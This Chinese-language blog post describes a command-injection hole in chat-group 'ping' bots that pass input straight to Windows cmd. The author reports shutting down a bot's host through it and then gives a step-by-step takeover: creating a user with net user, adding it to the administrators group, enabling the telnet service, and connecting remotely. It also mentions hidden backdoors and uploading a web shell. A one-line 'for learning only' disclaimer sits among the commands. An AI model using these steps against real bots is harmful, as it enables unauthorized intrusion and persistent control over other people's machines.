本站原创 ping机器人记一次偶然发现的漏洞

很多群里都会有这样的ping机器人，就像这样

先科普一下ping是什么东西

就是一个网络诊断工具，判断网络是否通畅以及速度怎么样

具体请自行百度：链接在此：ping-百度百科

好，进入正题，因为一次偶然的机会

我听说，有些机器人的ping并非机器人来测速，是直接用cmd进行测速

于是做了以下测试

机器人反馈给我一个信息

这个ip可能是这个机器人的共享ip，

我们得到以下结果，说明命令成功的被执行

我所输入的shutdown -s -t 1

意思是一秒后电脑关机（Windows系统的cmd，也叫dos系统）

这就有了以下思路

1.利用一次上面的命令，ping到一个它自身的ip（如果运气好，是它本身）

2.利用命令创建一个用户

3.进行提权，升级用户为超级管理员权限

4.开启telnet权限，打开端口（如果对方为IIS，或许可以ftp传入小马，等等，思路很广阔）

5.执行本地的远程连接进行连接，就可以控制对方电脑了

这就成功的进行了渗透，后面的事情就自己解决了

例如开隐形后门，当然，不建议各位这么做，只是做一个学习和试验

下面是上面涉及的命令，均以Windows系统为准，思路去渗透linux系统也是可以的

1.

ping xxx.xxx.xxx.xxx（ip或者网址）

例如：ping www.aqyzit.cn

2.
net user 用户名 密码 /add
创建一个用户，名为：123密码为：456
net user 123 456 /add
当然也可以不设置密码，不设置密码只要不打上密码就可以了，如：
net user 123 /add
3.

然后就加入管理员组了：
net localgroup administrators 用户名 /add
还用上面的那个账号来做，如：net localgroup administrators 123 /add

4.

telnet IP地址 端口号

cmd下开启代码：sc config tlntsvr start= auto
net start telnet

具体情况请参照，不作详细介绍：cmd下开启telnet的方法

5.打开本地的cmd

mstsc，打开本地的远程登录

那么这次记录就到这里，可能途中有些注意事项并未提及，但是大概思路就是这样，希望各位有所学习，讲得不好或者不对请指出

本站原创文章，转载请联系，或留下联系方式

作者：不将就 联系QQ：2716301893